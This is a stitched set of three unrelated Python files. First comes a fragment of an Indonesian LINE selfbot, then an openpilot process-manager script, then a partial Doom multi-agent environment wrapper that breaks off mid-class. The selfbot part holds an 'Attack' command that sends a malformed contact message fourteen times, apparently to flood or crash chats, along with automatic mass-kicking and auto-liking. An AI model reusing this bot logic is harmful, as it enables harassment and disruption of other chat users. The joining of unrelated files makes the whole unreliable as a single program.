except Exception as error:
print error
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No Invited")
else:
cl.sendText(msg.to,"Error")
else:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
cl.sendText(msg.to,van)
elif msg.text in ["Restart"]:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
elif msg.text in ["time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
blan = bulan[int(bln) - 1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "image " in msg.text:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "**INSTAGRAM INFO USER**\n"
details = "\n**INSTAGRAM INFO USER**"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif msg.text in ["Attack"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
elif msg.text.lower() == '.....':
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
#=================================PUY SCRIPT FINISHED =============================================#
elif "Ban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
cl.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
cl.sendText(msg.to,_nametarget + " Not In Blacklist")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Delete From Blacklist")
except:
cl.sendText(msg.to,_name + " Not In Blacklist")
elif msg.text in ["Clear"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"Blacklist Telah Dibersihkan")
elif msg.text in ["Ban:on"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unban:on"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="*Blacklist*"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == 'scan blacklist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.kickoutFromGroup(op.param1,[op.param3])
cl.updateGroup(G)
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Selamat Datang.")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Selamat Jalan.")
print "MEMBER HAS LEFT THE GROUP"
#------------------------------------------------------------------------------#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed, log the errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
from selfdrive.registration import register
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
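# Illustrative only (hypothetical entries, not part of the stock process list):
# a pure-Python process is registered with its module path, a native one with a
# (relative cwd, argv) tuple, mirroring how start_managed_process() dispatches below, e.g.
#   register_managed_process("mydaemon", "selfdrive.mydaemon")
#   register_managed_process("mynative", ("selfdrive/mynative", ["./mynative"]), car_started=True)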
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
doom_multiagent_wrapper.py
|
import threading
import time
from enum import Enum
from multiprocessing import Process
from queue import Empty, Queue
import faster_fifo
import cv2
import filelock
import gym
from filelock import FileLock
from sample_factory.envs.doom.doom_gym import doom_lock_file
from sample_factory.envs.doom.doom_render import concat_grid, cvt_doom_obs
from sample_factory.envs.doom.multiplayer.doom_multiagent import find_available_port, DEFAULT_UDP_PORT
from sample_factory.envs.env_utils import RewardShapingInterface, get_default_reward_shaping
from sample_factory.utils.utils import log
from functools import wraps
from time import sleep
def retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=False):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
for i in range(num_attempts):
try:
return func(*args, **kwargs)
except exception_class as e:
# This accesses the self instance variable
multiagent_wrapper_obj = args[0]
multiagent_wrapper_obj.initialized = False
multiagent_wrapper_obj.close()
# This is done to reset if it is in the step function
if should_reset:
multiagent_wrapper_obj.reset()
if i == num_attempts - 1:
raise
else:
log.error('Failed with error %r, trying again', e)
sleep(sleep_time)
return wrapper
return decorator
def safe_get(q, timeout=1e6, msg='Queue timeout'):
"""Using queue.get() with timeout is necessary, otherwise KeyboardInterrupt is not handled."""
while True:
try:
return q.get(timeout=timeout)
except Empty:
log.warning(msg)
def udp_port_num(env_config):
if env_config is None:
return DEFAULT_UDP_PORT
port_to_use = DEFAULT_UDP_PORT + 100 * env_config.worker_index + env_config.vector_index
return port_to_use
class TaskType(Enum):
INIT, TERMINATE, RESET, STEP, STEP_UPDATE, INFO, SET_ATTR = range(7)
def init_multiplayer_env(make_env_func, player_id, env_config, init_info=None):
env = make_env_func(player_id=player_id)
if env_config is not None and 'worker_index' in env_config:
env.unwrapped.worker_index = env_config.worker_index
if env_config is not None and 'vector_index' in env_config:
env.unwrapped.vector_index = env_config.vector_index
if init_info is None:
port_to_use = udp_port_num(env_config)
port = find_available_port(port_to_use, increment=1000)
log.debug('Using port %d', port)
init_info = dict(port=port)
env.unwrapped.init_info = init_info
env.seed(env.unwrapped.worker_index * 1000 + env.unwrapped.vector_index * 10 + player_id)
return env
class MultiAgentEnvWorker:
def __init__(self, player_id, make_env_func, env_config, use_multiprocessing=False, reset_on_init=True):
self.player_id = player_id
self.make_env_func = make_env_func
self.env_config = env_config
self.reset_on_init = reset_on_init
if use_multiprocessing:
self.process = Process(target=self.start, daemon=False)
self.task_queue, self.result_queue = faster_fifo.Queue(), faster_fifo.Queue()
else:
self.process = threading.Thread(target=self.start)
self.task_queue, self.result_queue = Queue(), Queue()
self.process.start()
def _init(self, init_info):
log.info('Initializing env for player %d, init_info: %r...', self.player_id, init_info)
env = init_multiplayer_env(self.make_env_func, self.player_id, self.env_config, init_info)
if self.reset_on_init:
env.reset()
return env
@staticmethod
def _terminate(env):
if env is None:
return
env.close()
@staticmethod
def _get_info(env):
"""Specific to custom VizDoom environments."""
info = {}
if hasattr(env.unwrapped, 'get_info_all'):
info = env.unwrapped.get_info_all() # info for the new episode
return info
def _set_env_attr(self, env, player_id, attr_chain, value):
"""Allows us to set an arbitrary attribute of the environment, e.g. attr_chain can be unwrapped.foo.bar"""
assert player_id == self.player_id
attrs = attr_chain.split('.')
curr_attr = env
try:
for attr_name in attrs[:-1]:
curr_attr = getattr(curr_attr, attr_name)
except AttributeError:
log.error('Env does not have an attribute %s', attr_chain)
attr_to_set = attrs[-1]
setattr(curr_attr, attr_to_set, value)
def start(self):
env = None
while True:
data, task_type = safe_get(self.task_queue)
if task_type == TaskType.INIT:
env = self._init(data)
self.result_queue.put(None) # signal we're done
continue
if task_type == TaskType.TERMINATE:
self._terminate(env)
break
results = None
if task_type == TaskType.RESET:
results = env.reset()
elif task_type == TaskType.INFO:
results = self._get_info(env)
elif task_type == TaskType.STEP or task_type == TaskType.STEP_UPDATE:
# collect obs, reward, done, and info
action = data
env.unwrapped.update_state = task_type == TaskType.STEP_UPDATE
results = env.step(action)
elif task_type == TaskType.SET_ATTR:
player_id, attr_chain, value = data
self._set_env_attr(env, player_id, attr_chain, value)
else:
raise Exception(f'Unknown task type {task_type}')
self.result_queue.put(results)
class MultiAgentEnv(gym.Env, RewardShapingInterface):
def __init__(self, num_agents, make_env_func, env_config, skip_frames):
gym.Env.__init__(self)
RewardShapingInterface.__init__(self)
self.num_agents = num_agents
log.debug('Multi agent env, num agents: %d', self.num_agents)
self.skip_frames = skip_frames # number of frames to skip (1 = no skip)
